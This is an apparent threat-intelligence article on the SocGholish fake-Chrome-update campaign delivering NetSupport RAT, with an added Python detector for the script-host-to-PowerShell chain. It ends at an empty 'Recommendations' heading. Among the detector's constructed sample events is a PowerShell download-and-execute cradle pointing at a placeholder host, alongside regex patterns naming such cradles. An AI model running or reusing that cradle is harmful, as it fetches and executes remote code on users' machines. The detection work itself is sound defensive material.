Cyble Research & Intelligence Labs observed threat actors using the fake-browser-update framework SocGholish to deliver the NetSupport RAT.
SocGholish has been active since 2017. It is a JavaScript malware framework; the “Soc” refers to its use of social engineering toolkits that masquerade as software updates to deploy malware on a victim’s system.
Researchers pointed out that this campaign uses various social engineering themes that imitate browser and program updates, including Chrome/Firefox, Flash Player, and Microsoft Teams.
The threat actors allegedly lured users with a fake Chrome update delivered through a drive-by-download mechanism. The attackers host a malicious website whose content urges visitors to install a critical browser update; the site then uses a drive-by download to deliver an archive file that contains the malware.
Once the archive is downloaded, the threat actor deploys an array of trojans and other malware, such as the Cobalt Strike framework and ransomware.
Upon clicking the “Update” button on the fake page, an archive file named “Сhrome.Updаte.zip” is downloaded and saved to the “Downloads” folder. The zip archive contains a heavily obfuscated JavaScript file named “AutoUpdater.js”.
Researchers say that when the JavaScript file is executed, it launches a PowerShell command that downloads and executes an additional PowerShell script from a remote server.
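The execution chain just described (a JavaScript file run from the Downloads folder spawning PowerShell with a download cradle) is something defenders can hunt for in process-creation telemetry. The following is an added example written for this page; it is not code from Cyble or from the article. It runs a simple detector over constructed, Sysmon-like process events whose field names, paths and the placeholder domain `example.invalid` are all assumptions made for the illustration.

```python
"""Added example (not from the Cyble report): flag the fake-update execution
chain in which a Windows script host running a .js file from the Downloads
folder spawns PowerShell with a download cradle. Event shape and sample
events are constructed for this illustration."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    # Assumed Sysmon-like field names for a process-creation event.
    event_id: int
    parent_image: str
    parent_cmdline: str
    image: str
    cmdline: str


SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")

# Fragments that typically indicate PowerShell fetching or decoding a second stage.
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"invoke-expression|\biex\b|-enc(odedcommand)?\b)",
    re.IGNORECASE,
)
# A .js file being run from any user's Downloads folder.
JS_FROM_DOWNLOADS_RE = re.compile(r"\\downloads\\[^\"']*\.js\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_fake_update_chain(ev: ProcEvent) -> bool:
    """True when a script host executing a Downloads\\*.js spawns PowerShell
    whose command line carries a download/decode cradle."""
    if basename(ev.parent_image) not in SCRIPT_HOSTS:
        return False
    if not JS_FROM_DOWNLOADS_RE.search(ev.parent_cmdline):
        return False
    if basename(ev.image) not in POWERSHELL:
        return False
    return CRADLE_RE.search(ev.cmdline) is not None


def find_fake_update_chains(events):
    """Return the event ids of all events matching the chain."""
    return [ev.event_id for ev in events if is_fake_update_chain(ev)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Matches the chain described in the article: wscript running the fake
    # updater from Downloads, then PowerShell pulling a script from a remote host.
    ProcEvent(
        1,
        r"C:\Windows\System32\wscript.exe",
        r'wscript.exe "C:\Users\alice\Downloads\Chrome.Update\AutoUpdater.js"',
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
        ".DownloadString('http://example.invalid/update.ps1')\"",
    ),
    # Benign: an interactive PowerShell started from Explorer.
    ProcEvent(
        2,
        r"C:\Windows\explorer.exe",
        "explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -NoProfile -Command Get-ChildItem",
    ),
    # Script from Downloads, but it only spawns cmd.exe with no cradle.
    ProcEvent(
        3,
        r"C:\Windows\System32\cscript.exe",
        r'cscript.exe "C:\Users\bob\Downloads\report.js"',
        r"C:\Windows\System32\cmd.exe",
        "cmd.exe /c dir",
    ),
]

if __name__ == "__main__":
    print("suspicious event ids:", find_fake_update_chains(SAMPLE_EVENTS))
```

The three conditions are deliberately conjunctive: a script host alone, or a PowerShell download cradle alone, each produce too many benign hits in an enterprise, while the combination of a Downloads-resident .js parent and a cradle-bearing PowerShell child is specific to this kind of fake-update lure. In a real deployment the regexes would be applied to whatever command-line field your EDR or Sysmon pipeline exposes.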
NetSupport Manager is a commercially available RAT (Remote Administration Tool) with legitimate uses: it gives administrators remote access to users’ computers. Threat actors, however, use NetSupport Manager as their primary tool for gaining remote access to victims.
The NetSupport RAT malware package is dropped under the %AppData% directory.
It is always worthwhile to confirm that downloaded content originated from a legitimate source rather than from a suspicious site.
Recommendations